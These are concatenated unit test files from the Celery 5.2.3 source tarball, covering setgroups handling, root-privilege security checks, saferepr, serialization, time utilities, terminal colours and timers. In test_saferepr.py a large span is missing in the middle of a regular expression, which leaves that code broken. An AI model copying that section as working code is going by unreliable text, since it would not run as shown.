pytest.raises(LockFailed): p.write_pid() class test_setgroups: @patch('os.setgroups', create=True) def test_setgroups_hack_ValueError(self, setgroups): def on_setgroups(groups): if len(groups) <= 200: setgroups.return_value = True return raise ValueError() setgroups.side_effect = on_setgroups _setgroups_hack(list(range(400))) setgroups.side_effect = ValueError() with pytest.raises(ValueError): _setgroups_hack(list(range(400))) @patch('os.setgroups', create=True) def test_setgroups_hack_OSError(self, setgroups): exc = OSError() exc.errno = errno.EINVAL def on_setgroups(groups): if len(groups) <= 200: setgroups.return_value = True return raise exc setgroups.side_effect = on_setgroups _setgroups_hack(list(range(400))) setgroups.side_effect = exc with pytest.raises(OSError): _setgroups_hack(list(range(400))) exc2 = OSError() exc.errno = errno.ESRCH setgroups.side_effect = exc2 with pytest.raises(OSError): _setgroups_hack(list(range(400))) @t.skip.if_win32 @patch('celery.platforms._setgroups_hack') def test_setgroups(self, hack): with patch('os.sysconf') as sysconf: sysconf.return_value = 100 setgroups(list(range(400))) hack.assert_called_with(list(range(100))) @t.skip.if_win32 @patch('celery.platforms._setgroups_hack') def test_setgroups_sysconf_raises(self, hack): with patch('os.sysconf') as sysconf: sysconf.side_effect = ValueError() setgroups(list(range(400))) hack.assert_called_with(list(range(400))) @t.skip.if_win32 @patch('os.getgroups') @patch('celery.platforms._setgroups_hack') def test_setgroups_raises_ESRCH(self, hack, getgroups): with patch('os.sysconf') as sysconf: sysconf.side_effect = ValueError() esrch = OSError() esrch.errno = errno.ESRCH hack.side_effect = esrch with pytest.raises(OSError): setgroups(list(range(400))) @t.skip.if_win32 @patch('os.getgroups') @patch('celery.platforms._setgroups_hack') def test_setgroups_raises_EPERM(self, hack, getgroups): with patch('os.sysconf') as sysconf: sysconf.side_effect = ValueError() eperm = OSError() eperm.errno = errno.EPERM hack.side_effect = eperm getgroups.return_value = list(range(400)) setgroups(list(range(400))) getgroups.assert_called_with() getgroups.return_value = [1000] with pytest.raises(OSError): setgroups(list(range(400))) getgroups.assert_called_with() fails_on_win32 = pytest.mark.xfail( sys.platform == "win32", reason="fails on py38+ windows", ) @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'}, ]) @patch('celery.platforms.os') def test_check_privileges_suspicious_platform(os_module, accept_content): del os_module.getuid del os_module.getgid del os_module.geteuid del os_module.getegid with pytest.raises(SecurityError, match=r'suspicious platform, contact support'): check_privileges(accept_content) @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) def test_check_privileges(accept_content, recwarn): check_privileges(accept_content) assert len(recwarn) == 0 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') def test_check_privileges_no_fchown(os_module, accept_content, recwarn): del os_module.fchown check_privileges(accept_content) assert len(recwarn) == 0 @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') def test_check_privileges_without_c_force_root(os_module, accept_content): os_module.environ = {} os_module.getuid.return_value = 0 os_module.getgid.return_value = 0 os_module.geteuid.return_value = 0 os_module.getegid.return_value = 0 expected_message = re.escape(ROOT_DISALLOWED.format(uid=0, euid=0, gid=0, egid=0)) with pytest.raises(SecurityError, match=expected_message): check_privileges(accept_content) @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') def test_check_privileges_with_c_force_root(os_module, accept_content): os_module.environ = {'C_FORCE_ROOT': 'true'} os_module.getuid.return_value = 0 os_module.getgid.return_value = 0 os_module.geteuid.return_value = 0 os_module.getegid.return_value = 0 with pytest.warns(SecurityWarning): check_privileges(accept_content) @fails_on_win32 @pytest.mark.parametrize(('accept_content', 'group_name'), [ ({'pickle'}, 'sudo'), ({'application/group-python-serialize'}, 'sudo'), ({'pickle', 'application/group-python-serialize'}, 'sudo'), ({'pickle'}, 'wheel'), ({'application/group-python-serialize'}, 'wheel'), ({'pickle', 'application/group-python-serialize'}, 'wheel'), ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_with_c_force_root_and_with_suspicious_group( grp_module, os_module, accept_content, group_name ): os_module.environ = {'C_FORCE_ROOT': 'true'} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.return_value = [group_name] grp_module.getgrgid.return_value = [group_name] expected_message = re.escape(ROOT_DISCOURAGED.format(uid=60, euid=60, gid=60, egid=60)) with pytest.warns(SecurityWarning, match=expected_message): check_privileges(accept_content) @fails_on_win32 @pytest.mark.parametrize(('accept_content', 'group_name'), [ ({'pickle'}, 'sudo'), ({'application/group-python-serialize'}, 'sudo'), ({'pickle', 'application/group-python-serialize'}, 'sudo'), ({'pickle'}, 'wheel'), ({'application/group-python-serialize'}, 'wheel'), ({'pickle', 'application/group-python-serialize'}, 'wheel'), ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_without_c_force_root_and_with_suspicious_group( grp_module, os_module, accept_content, group_name ): os_module.environ = {} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.return_value = [group_name] grp_module.getgrgid.return_value = [group_name] expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60, gid=60, egid=60)) with pytest.raises(SecurityError, match=expected_message): check_privileges(accept_content) @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_with_c_force_root_and_no_group_entry( grp_module, os_module, accept_content, recwarn ): os_module.environ = {'C_FORCE_ROOT': 'true'} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.side_effect = KeyError expected_message = ROOT_DISCOURAGED.format(uid=60, euid=60, gid=60, egid=60) check_privileges(accept_content) assert len(recwarn) == 2 assert recwarn[0].message.args[0] == ASSUMING_ROOT assert recwarn[1].message.args[0] == expected_message @fails_on_win32 @pytest.mark.parametrize('accept_content', [ {'pickle'}, {'application/group-python-serialize'}, {'pickle', 'application/group-python-serialize'} ]) @patch('celery.platforms.os') @patch('celery.platforms.grp') def test_check_privileges_without_c_force_root_and_no_group_entry( grp_module, os_module, accept_content, recwarn ): os_module.environ = {} os_module.getuid.return_value = 60 os_module.getgid.return_value = 60 os_module.geteuid.return_value = 60 os_module.getegid.return_value = 60 grp_module.getgrgid.side_effect = KeyError expected_message = re.escape(ROOT_DISALLOWED.format(uid=60, euid=60, gid=60, egid=60)) with pytest.raises(SecurityError, match=expected_message): check_privileges(accept_content) assert recwarn[0].message.args[0] == ASSUMING_ROOT def test_skip_checking_privileges_when_grp_is_unavailable(recwarn): with patch("celery.platforms.grp", new=None): check_privileges({'pickle'}) assert len(recwarn) == 0 def test_skip_checking_privileges_when_pwd_is_unavailable(recwarn): with patch("celery.platforms.pwd", new=None): check_privileges({'pickle'}) assert len(recwarn) == 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_saferepr.py0000664000175000017500000001266300000000000020507 0ustar00asifasif00000000000000import ast import re import struct from decimal import Decimal from pprint import pprint import pytest from celery.utils.saferepr import saferepr D_NUMBERS = { b'integer': 1, b'float': 1.3, b'decimal': Decimal('1.3'), b'long': 4, b'complex': complex(13.3), } D_INT_KEYS = {v: k for k, v in D_NUMBERS.items()} QUICK_BROWN_FOX = 'The quick brown fox jumps over the lazy dog.' B_QUICK_BROWN_FOX = b'The quick brown fox jumps over the lazy dog.' D_TEXT = { b'foo': QUICK_BROWN_FOX, b'bar': B_QUICK_BROWN_FOX, b'baz': B_QUICK_BROWN_FOX, b'xuzzy': B_QUICK_BROWN_FOX, } L_NUMBERS = list(D_NUMBERS.values()) D_TEXT_LARGE = { b'bazxuzzyfoobarlongverylonglong': QUICK_BROWN_FOX * 30, } D_ALL = { b'numbers': D_NUMBERS, b'intkeys': D_INT_KEYS, b'text': D_TEXT, b'largetext': D_TEXT_LARGE, } D_D_TEXT = {b'rest': D_TEXT} RE_OLD_SET_REPR = re.compile(r'(?QQQ', 12223, 1234, 3123) if hasattr(bytes, 'hex'): # Python 3.5+ assert '2fbf' in saferepr(val, maxlen=128) else: # Python 3.4 assert saferepr(val, maxlen=128) def test_binary_bytes__long(self): val = struct.pack('>QQQ', 12223, 1234, 3123) * 1024 result = saferepr(val, maxlen=128) assert '2fbf' in result assert result.endswith("...'") def test_repr_raises(self): class O: def __repr__(self): raise KeyError('foo') assert 'Unrepresentable' in saferepr(O()) def test_bytes_with_unicode_py2_and_3(self): assert saferepr([b'foo', 'a®rgs'.encode()]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_serialization.py0000664000175000017500000000651300000000000021552 0ustar00asifasif00000000000000import json import pickle import sys from datetime import date, datetime, time, timedelta from unittest.mock import Mock import pytest import pytz from kombu import Queue from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE, UnpickleableExceptionWrapper, ensure_serializable, get_pickleable_etype, jsonify, strtobool) class test_AAPickle: @pytest.mark.masked_modules('cPickle') def test_no_cpickle(self, mask_modules): prev = sys.modules.pop('celery.utils.serialization', None) try: import pickle as orig_pickle from celery.utils.serialization import pickle assert pickle.dumps is orig_pickle.dumps finally: sys.modules['celery.utils.serialization'] = prev class test_ensure_serializable: def test_json_py3(self): expected = (1, "") actual = ensure_serializable([1, object], encoder=json.dumps) assert expected == actual def test_pickle(self): expected = (1, object) actual = ensure_serializable(expected, encoder=pickle.dumps) assert expected == actual class test_UnpickleExceptionWrapper: def test_init(self): x = UnpickleableExceptionWrapper('foo', 'Bar', [10, lambda x: x]) assert x.exc_args assert len(x.exc_args) == 2 class test_get_pickleable_etype: def test_get_pickleable_etype(self): class Unpickleable(Exception): def __reduce__(self): raise ValueError('foo') assert get_pickleable_etype(Unpickleable) is Exception class test_jsonify: @pytest.mark.parametrize('obj', [ Queue('foo'), ['foo', 'bar', 'baz'], {'foo': 'bar'}, datetime.utcnow(), datetime.utcnow().replace(tzinfo=pytz.utc), datetime.utcnow().replace(microsecond=0), date(2012, 1, 1), time(hour=1, minute=30), time(hour=1, minute=30, microsecond=3), timedelta(seconds=30), 10, 10.3, 'hello', ]) def test_simple(self, obj): assert jsonify(obj) def test_unknown_type_filter(self): unknown_type_filter = Mock() obj = object() assert (jsonify(obj, unknown_type_filter=unknown_type_filter) is unknown_type_filter.return_value) unknown_type_filter.assert_called_with(obj) with pytest.raises(ValueError): jsonify(obj) class test_strtobool: @pytest.mark.parametrize('s,b', STRTOBOOL_DEFAULT_TABLE.items()) def test_default_table(self, s, b): assert strtobool(s) == b def test_unknown_value(self): with pytest.raises(TypeError, # todo replace below when dropping python 2.7 # match="Cannot coerce 'foo' to type bool"): match=r"Cannot coerce u?'foo' to type bool"): strtobool('foo') def test_no_op(self): assert strtobool(1) == 1 def test_custom_table(self): custom_table = { 'foo': True, 'bar': False } assert strtobool("foo", table=custom_table) assert not strtobool("bar", table=custom_table) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_sysinfo.py0000664000175000017500000000135700000000000020370 0ustar00asifasif00000000000000import importlib import os import pytest from celery.utils.sysinfo import df, load_average try: posix = importlib.import_module('posix') except Exception: posix = None @pytest.mark.skipif( not hasattr(os, 'getloadavg'), reason='Function os.getloadavg is not defined' ) def test_load_average(patching): getloadavg = patching('os.getloadavg') getloadavg.return_value = 0.54736328125, 0.6357421875, 0.69921875 l = load_average() assert l assert l == (0.55, 0.64, 0.7) @pytest.mark.skipif( not hasattr(posix, 'statvfs_result'), reason='Function posix.statvfs_result is not defined' ) def test_df(): x = df('/') assert x.total_blocks assert x.available assert x.capacity assert x.stat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_term.py0000664000175000017500000000330600000000000017641 0ustar00asifasif00000000000000import pytest import t.skip from celery.utils import term from celery.utils.term import colored, fg @t.skip.if_win32 class test_colored: @pytest.fixture(autouse=True) def preserve_encoding(self, patching): patching('sys.getdefaultencoding', 'utf-8') @pytest.mark.parametrize('name,color', [ ('black', term.BLACK), ('red', term.RED), ('green', term.GREEN), ('yellow', term.YELLOW), ('blue', term.BLUE), ('magenta', term.MAGENTA), ('cyan', term.CYAN), ('white', term.WHITE), ]) def test_colors(self, name, color): assert fg(30 + color) in str(colored().names[name]('foo')) @pytest.mark.parametrize('name', [ 'bold', 'underline', 'blink', 'reverse', 'bright', 'ired', 'igreen', 'iyellow', 'iblue', 'imagenta', 'icyan', 'iwhite', 'reset', ]) def test_modifiers(self, name): assert str(getattr(colored(), name)('f')) def test_unicode(self): assert str(colored().green('∂bar')) assert colored().red('éefoo') + colored().green('∂bar') assert colored().red('foo').no_color() == 'foo' def test_repr(self): assert repr(colored().blue('åfoo')) assert "''" in repr(colored()) def test_more_unicode(self): c = colored() s = c.red('foo', c.blue('bar'), c.green('baz')) assert s.no_color() c._fold_no_color(s, 'øfoo') c._fold_no_color('fooå', s) c = colored().red('åfoo') assert c._add(c, 'baræ') == '\x1b[1;31m\xe5foo\x1b[0mbar\xe6' c2 = colored().blue('ƒƒz') c3 = c._add(c, c2) assert c3 == '\x1b[1;31m\xe5foo\x1b[0m\x1b[1;34m\u0192\u0192z\x1b[0m' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_text.py0000664000175000017500000000366000000000000017661 0ustar00asifasif00000000000000import pytest from celery.utils.text import (abbr, abbrtask, ensure_newlines, indent, pretty, truncate) RANDTEXT = """\ The quick brown fox jumps over the lazy dog\ """ RANDTEXT_RES = """\ The quick brown fox jumps over the lazy dog\ """ QUEUES = { 'queue1': { 'exchange': 'exchange1', 'exchange_type': 'type1', 'routing_key': 'bind1', }, 'queue2': { 'exchange': 'exchange2', 'exchange_type': 'type2', 'routing_key': 'bind2', }, } QUEUE_FORMAT1 = '.> queue1 exchange=exchange1(type1) key=bind1' QUEUE_FORMAT2 = '.> queue2 exchange=exchange2(type2) key=bind2' class test_Info: def test_textindent(self): assert indent(RANDTEXT, 4) == RANDTEXT_RES def test_format_queues(self, app): app.amqp.queues = app.amqp.Queues(QUEUES) assert (sorted(app.amqp.queues.format().split('\n')) == sorted([QUEUE_FORMAT1, QUEUE_FORMAT2])) def test_ensure_newlines(self): assert len(ensure_newlines('foo\nbar\nbaz\n').splitlines()) == 3 assert len(ensure_newlines('foo\nbar').splitlines()) == 2 @pytest.mark.parametrize('s,maxsize,expected', [ ('ABCDEFGHI', 3, 'ABC...'), ('ABCDEFGHI', 10, 'ABCDEFGHI'), ]) def test_truncate_text(s, maxsize, expected): assert truncate(s, maxsize) == expected @pytest.mark.parametrize('args,expected', [ ((None, 3), '???'), (('ABCDEFGHI', 6), 'ABC...'), (('ABCDEFGHI', 20), 'ABCDEFGHI'), (('ABCDEFGHI', 6, None), 'ABCDEF'), ]) def test_abbr(args, expected): assert abbr(*args) == expected @pytest.mark.parametrize('s,maxsize,expected', [ (None, 3, '???'), ('feeds.tasks.refresh', 10, '[.]refresh'), ('feeds.tasks.refresh', 30, 'feeds.tasks.refresh'), ]) def test_abbrtask(s, maxsize, expected): assert abbrtask(s, maxsize) == expected def test_pretty(): assert pretty(('a', 'b', 'c')) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_threads.py0000664000175000017500000000463700000000000020334 0ustar00asifasif00000000000000from unittest.mock import patch import pytest from celery.utils.threads import (Local, LocalManager, _FastLocalStack, _LocalStack, bgThread) from t.unit import conftest class test_bgThread: def test_crash(self): class T(bgThread): def body(self): raise KeyError() with patch('os._exit') as _exit: with conftest.stdouts(): _exit.side_effect = ValueError() t = T() with pytest.raises(ValueError): t.run() _exit.assert_called_with(1) def test_interface(self): x = bgThread() with pytest.raises(NotImplementedError): x.body() class test_Local: def test_iter(self): x = Local() x.foo = 'bar' ident = x.__ident_func__() assert (ident, {'foo': 'bar'}) in list(iter(x)) delattr(x, 'foo') assert (ident, {'foo': 'bar'}) not in list(iter(x)) with pytest.raises(AttributeError): delattr(x, 'foo') assert x(lambda: 'foo') is not None class test_LocalStack: def test_stack(self): x = _LocalStack() assert x.pop() is None x.__release_local__() ident = x.__ident_func__ x.__ident_func__ = ident with pytest.raises(RuntimeError): x()[0] x.push(['foo']) assert x()[0] == 'foo' x.pop() with pytest.raises(RuntimeError): x()[0] class test_FastLocalStack: def test_stack(self): x = _FastLocalStack() x.push(['foo']) x.push(['bar']) assert x.top == ['bar'] assert len(x) == 2 x.pop() assert x.top == ['foo'] x.pop() assert x.top is None class test_LocalManager: def test_init(self): x = LocalManager() assert x.locals == [] assert x.ident_func def ident(): return 1 loc = Local() x = LocalManager([loc], ident_func=ident) assert x.locals == [loc] x = LocalManager(loc, ident_func=ident) assert x.locals == [loc] assert x.ident_func is ident assert x.locals[0].__ident_func__ is ident assert x.get_ident() == 1 with patch('celery.utils.threads.release_local') as release: x.cleanup() release.assert_called_with(loc) assert repr(x) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_time.py0000664000175000017500000002672200000000000017637 0ustar00asifasif00000000000000from datetime import datetime, timedelta, tzinfo from unittest.mock import Mock, patch import pytest import pytz from pytz import AmbiguousTimeError from celery.utils.iso8601 import parse_iso8601 from celery.utils.time import (LocalTimezone, delta_resolution, ffwd, get_exponential_backoff_interval, humanize_seconds, localize, make_aware, maybe_iso8601, maybe_make_aware, maybe_timedelta, rate, remaining, timezone, utcoffset) class test_LocalTimezone: def test_daylight(self, patching): time = patching('celery.utils.time._time') time.timezone = 3600 time.daylight = False x = LocalTimezone() assert x.STDOFFSET == timedelta(seconds=-3600) assert x.DSTOFFSET == x.STDOFFSET time.daylight = True time.altzone = 3600 y = LocalTimezone() assert y.STDOFFSET == timedelta(seconds=-3600) assert y.DSTOFFSET == timedelta(seconds=-3600) assert repr(y) y._isdst = Mock() y._isdst.return_value = True assert y.utcoffset(datetime.now()) assert not y.dst(datetime.now()) y._isdst.return_value = False assert y.utcoffset(datetime.now()) assert not y.dst(datetime.now()) assert y.tzname(datetime.now()) class test_iso8601: def test_parse_with_timezone(self): d = datetime.utcnow().replace(tzinfo=pytz.utc) assert parse_iso8601(d.isoformat()) == d # 2013-06-07T20:12:51.775877+00:00 iso = d.isoformat() iso1 = iso.replace('+00:00', '-01:00') d1 = parse_iso8601(iso1) assert d1.tzinfo._minutes == -60 iso2 = iso.replace('+00:00', '+01:00') d2 = parse_iso8601(iso2) assert d2.tzinfo._minutes == +60 iso3 = iso.replace('+00:00', 'Z') d3 = parse_iso8601(iso3) assert d3.tzinfo == pytz.UTC @pytest.mark.parametrize('delta,expected', [ (timedelta(days=2), datetime(2010, 3, 30, 0, 0)), (timedelta(hours=2), datetime(2010, 3, 30, 11, 0)), (timedelta(minutes=2), datetime(2010, 3, 30, 11, 50)), (timedelta(seconds=2), None), ]) def test_delta_resolution(delta, expected): dt = datetime(2010, 3, 30, 11, 50, 58, 41065) assert delta_resolution(dt, delta) == expected or dt @pytest.mark.parametrize('seconds,expected', [ (4 * 60 * 60 * 24, '4.00 days'), (1 * 60 * 60 * 24, '1.00 day'), (4 * 60 * 60, '4.00 hours'), (1 * 60 * 60, '1.00 hour'), (4 * 60, '4.00 minutes'), (1 * 60, '1.00 minute'), (4, '4.00 seconds'), (1, '1.00 second'), (4.3567631221, '4.36 seconds'), (0, 'now'), ]) def test_humanize_seconds(seconds, expected): assert humanize_seconds(seconds) == expected def test_humanize_seconds__prefix(): assert humanize_seconds(4, prefix='about ') == 'about 4.00 seconds' def test_maybe_iso8601_datetime(): now = datetime.now() assert maybe_iso8601(now) is now @pytest.mark.parametrize('arg,expected', [ (30, timedelta(seconds=30)), (30.6, timedelta(seconds=30.6)), (timedelta(days=2), timedelta(days=2)), ]) def test_maybe_timedelta(arg, expected): assert maybe_timedelta(arg) == expected def test_remaining(): # Relative remaining(datetime.utcnow(), timedelta(hours=1), relative=True) """ The upcoming cases check whether the next run is calculated correctly """ eastern_tz = pytz.timezone("US/Eastern") tokyo_tz = pytz.timezone("Asia/Tokyo") # Case 1: `start` in UTC and `now` in other timezone start = datetime.now(pytz.utc) now = datetime.now(eastern_tz) delta = timedelta(hours=1) assert str(start.tzinfo) == str(pytz.utc) assert str(now.tzinfo) == str(eastern_tz) rem_secs = remaining(start, delta, now).total_seconds() # assert remaining time is approximately equal to delta assert rem_secs == pytest.approx(delta.total_seconds(), abs=1) # Case 2: `start` and `now` in different timezones (other than UTC) start = datetime.now(eastern_tz) now = datetime.now(tokyo_tz) delta = timedelta(hours=1) assert str(start.tzinfo) == str(eastern_tz) assert str(now.tzinfo) == str(tokyo_tz) rem_secs = remaining(start, delta, now).total_seconds() assert rem_secs == pytest.approx(delta.total_seconds(), abs=1) """ Case 3: DST check Suppose start (which is last_run_time) is in EST while next_run is in EDT, then check whether the `next_run` is actually the time specified in the start (i.e. there is not an hour diff due to DST). In 2019, DST starts on March 10 """ start = eastern_tz.localize(datetime(month=3, day=9, year=2019, hour=10, minute=0)) # EST now = eastern_tz.localize(datetime(day=11, month=3, year=2019, hour=1, minute=0)) # EDT delta = ffwd(hour=10, year=2019, microsecond=0, minute=0, second=0, day=11, weeks=0, month=3) # `next_actual_time` is the next time to run (derived from delta) next_actual_time = eastern_tz.localize(datetime(day=11, month=3, year=2019, hour=10, minute=0)) # EDT assert start.tzname() == "EST" assert now.tzname() == "EDT" assert next_actual_time.tzname() == "EDT" rem_time = remaining(start, delta, now) next_run = now + rem_time assert next_run == next_actual_time class test_timezone: def test_get_timezone_with_pytz(self): assert timezone.get_timezone('UTC') def test_tz_or_local(self): assert timezone.tz_or_local() == timezone.local assert timezone.tz_or_local(timezone.utc) def test_to_local(self): assert timezone.to_local(make_aware(datetime.utcnow(), timezone.utc)) assert timezone.to_local(datetime.utcnow()) def test_to_local_fallback(self): assert timezone.to_local_fallback( make_aware(datetime.utcnow(), timezone.utc)) assert timezone.to_local_fallback(datetime.utcnow()) class test_make_aware: def test_tz_without_localize(self): tz = tzinfo() assert not hasattr(tz, 'localize') wtz = make_aware(datetime.utcnow(), tz) assert wtz.tzinfo == tz def test_when_has_localize(self): class tzz(tzinfo): raises = False def localize(self, dt, is_dst=None): self.localized = True if self.raises and is_dst is None: self.raised = True raise AmbiguousTimeError() return 1 # needed by min() in Python 3 (None not hashable) tz = tzz() make_aware(datetime.utcnow(), tz) assert tz.localized tz2 = tzz() tz2.raises = True make_aware(datetime.utcnow(), tz2) assert tz2.localized assert tz2.raised def test_maybe_make_aware(self): aware = datetime.utcnow().replace(tzinfo=timezone.utc) assert maybe_make_aware(aware) naive = datetime.utcnow() assert maybe_make_aware(naive) assert maybe_make_aware(naive).tzinfo is pytz.utc tz = pytz.timezone('US/Eastern') eastern = datetime.utcnow().replace(tzinfo=tz) assert maybe_make_aware(eastern).tzinfo is tz utcnow = datetime.utcnow() assert maybe_make_aware(utcnow, 'UTC').tzinfo is pytz.utc class test_localize: def test_tz_without_normalize(self): class tzz(tzinfo): def utcoffset(self, dt): return None # Mock no utcoffset specified tz = tzz() assert not hasattr(tz, 'normalize') assert localize(make_aware(datetime.utcnow(), tz), tz) def test_when_has_normalize(self): class tzz(tzinfo): raises = None def utcoffset(self, dt): return None def normalize(self, dt, **kwargs): self.normalized = True if self.raises and kwargs and kwargs.get('is_dst') is None: self.raised = True raise self.raises return 1 # needed by min() in Python 3 (None not hashable) tz = tzz() localize(make_aware(datetime.utcnow(), tz), tz) assert tz.normalized tz2 = tzz() tz2.raises = AmbiguousTimeError() localize(make_aware(datetime.utcnow(), tz2), tz2) assert tz2.normalized assert tz2.raised tz3 = tzz() tz3.raises = TypeError() localize(make_aware(datetime.utcnow(), tz3), tz3) assert tz3.normalized assert tz3.raised def test_localize_changes_utc_dt(self): now_utc_time = datetime.now(tz=pytz.utc) local_tz = pytz.timezone('US/Eastern') localized_time = localize(now_utc_time, local_tz) assert localized_time == now_utc_time def test_localize_aware_dt_idempotent(self): t = (2017, 4, 23, 21, 36, 59, 0) local_zone = pytz.timezone('America/New_York') local_time = datetime(*t) local_time_aware = datetime(*t, tzinfo=local_zone) alternate_zone = pytz.timezone('America/Detroit') localized_time = localize(local_time_aware, alternate_zone) assert localized_time == local_time_aware assert local_zone.utcoffset( local_time) == alternate_zone.utcoffset(local_time) localized_utc_offset = localized_time.tzinfo.utcoffset(local_time) assert localized_utc_offset == alternate_zone.utcoffset(local_time) assert localized_utc_offset == local_zone.utcoffset(local_time) @pytest.mark.parametrize('s,expected', [ (999, 999), (7.5, 7.5), ('2.5/s', 2.5), ('1456/s', 1456), ('100/m', 100 / 60.0), ('10/h', 10 / 60.0 / 60.0), (0, 0), (None, 0), ('0/m', 0), ('0/h', 0), ('0/s', 0), ('0.0/s', 0), ]) def test_rate_limit_string(s, expected): assert rate(s) == expected class test_ffwd: def test_repr(self): x = ffwd(year=2012) assert repr(x) def test_radd_with_unknown_gives_NotImplemented(self): x = ffwd(year=2012) assert x.__radd__(object()) == NotImplemented class test_utcoffset: def test_utcoffset(self, patching): _time = patching('celery.utils.time._time') _time.daylight = True assert utcoffset(time=_time) is not None _time.daylight = False assert utcoffset(time=_time) is not None class test_get_exponential_backoff_interval: @patch('random.randrange', lambda n: n - 2) def test_with_jitter(self): assert get_exponential_backoff_interval( factor=4, retries=3, maximum=100, full_jitter=True ) == 4 * (2 ** 3) - 1 def test_without_jitter(self): assert get_exponential_backoff_interval( factor=4, retries=3, maximum=100, full_jitter=False ) == 4 * (2 ** 3) def test_bound_by_maximum(self): maximum_boundary = 100 assert get_exponential_backoff_interval( factor=40, retries=3, maximum=maximum_boundary ) == maximum_boundary @patch('random.randrange', lambda n: n - 1) def test_negative_values(self): assert get_exponential_backoff_interval( factor=-40, retries=3, maximum=100 ) == 0 @patch('random.randrange') def test_valid_random_range(self, rr): rr.return_value = 0 maximum = 100 get_exponential_backoff_interval(factor=40, retries=10, maximum=maximum, full_jitter=True) rr.assert_called_once_with(maximum + 1) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_timer2.py0000664000175000017500000000621700000000000020100 0ustar00asifasif00000000000000import sys import time from unittest.mock import Mock, call, patch from celery.utils import timer2 as timer2 class test_Timer: def test_enter_after(self): t = timer2.Timer() try: done = [False] def set_done(): done[0] = True t.call_after(0.3, set_done) mss = 0 while not done[0]: if mss >= 2.0: raise Exception('test timed out') time.sleep(0.1) mss += 0.1 finally: t.stop() def test_exit_after(self): t = timer2.Timer() t.call_after = Mock() t.exit_after(0.3, priority=10) t.call_after.assert_called_with(0.3, sys.exit, 10) def test_ensure_started_not_started(self): t = timer2.Timer() t.running = True t.start = Mock() t.ensure_started() t.start.assert_not_called() t.running = False t.on_start = Mock() t.ensure_started() t.on_start.assert_called_with(t) t.start.assert_called_with() @patch('celery.utils.timer2.sleep') @patch('os._exit') # To ensure the test fails gracefully def test_on_tick(self, _exit, sleep): def next_entry_side_effect(): # side effect simulating following scenario: # 3.33, 3.33, 3.33, for _ in range(3): yield 3.33 while True: yield getattr(t, "_Timer__is_shutdown").set() on_tick = Mock(name='on_tick') t = timer2.Timer(on_tick=on_tick) t._next_entry = Mock( name='_next_entry', side_effect=next_entry_side_effect() ) t.run() sleep.assert_called_with(3.33) on_tick.assert_has_calls([call(3.33), call(3.33), call(3.33)]) _exit.assert_not_called() @patch('os._exit') def test_thread_crash(self, _exit): t = timer2.Timer() t._next_entry = Mock() t._next_entry.side_effect = OSError(131) t.run() _exit.assert_called_with(1) def test_gc_race_lost(self): t = timer2.Timer() with patch.object(t, "_Timer__is_stopped") as mock_stop_event: # Mark the timer as shutting down so we escape the run loop, # mocking the running state so we don't block! with patch.object(t, "running", new=False): t.stop() # Pretend like the interpreter has shutdown and GCed built-in # modules, causing an exception mock_stop_event.set.side_effect = TypeError() t.run() mock_stop_event.set.assert_called_with() def test_test_enter(self): t = timer2.Timer() t._do_enter = Mock() e = Mock() t.enter(e, 13, 0) t._do_enter.assert_called_with('enter_at', e, 13, priority=0) def test_test_enter_after(self): t = timer2.Timer() t._do_enter = Mock() t.enter_after() t._do_enter.assert_called_with('enter_after') def test_cancel(self): t = timer2.Timer() tref = Mock() t.cancel(tref) tref.cancel.assert_called_with() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_utils.py0000664000175000017500000000116000000000000020026 0ustar00asifasif00000000000000import pytest from celery.utils import cached_property, chunks @pytest.mark.parametrize('items,n,expected', [ (range(11), 2, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]]), (range(11), 3, [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]]), (range(10), 2, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]), ]) def test_chunks(items, n, expected): x = chunks(iter(list(items)), n) assert list(x) == expected def test_cached_property(): def fun(obj): return fun.value x = 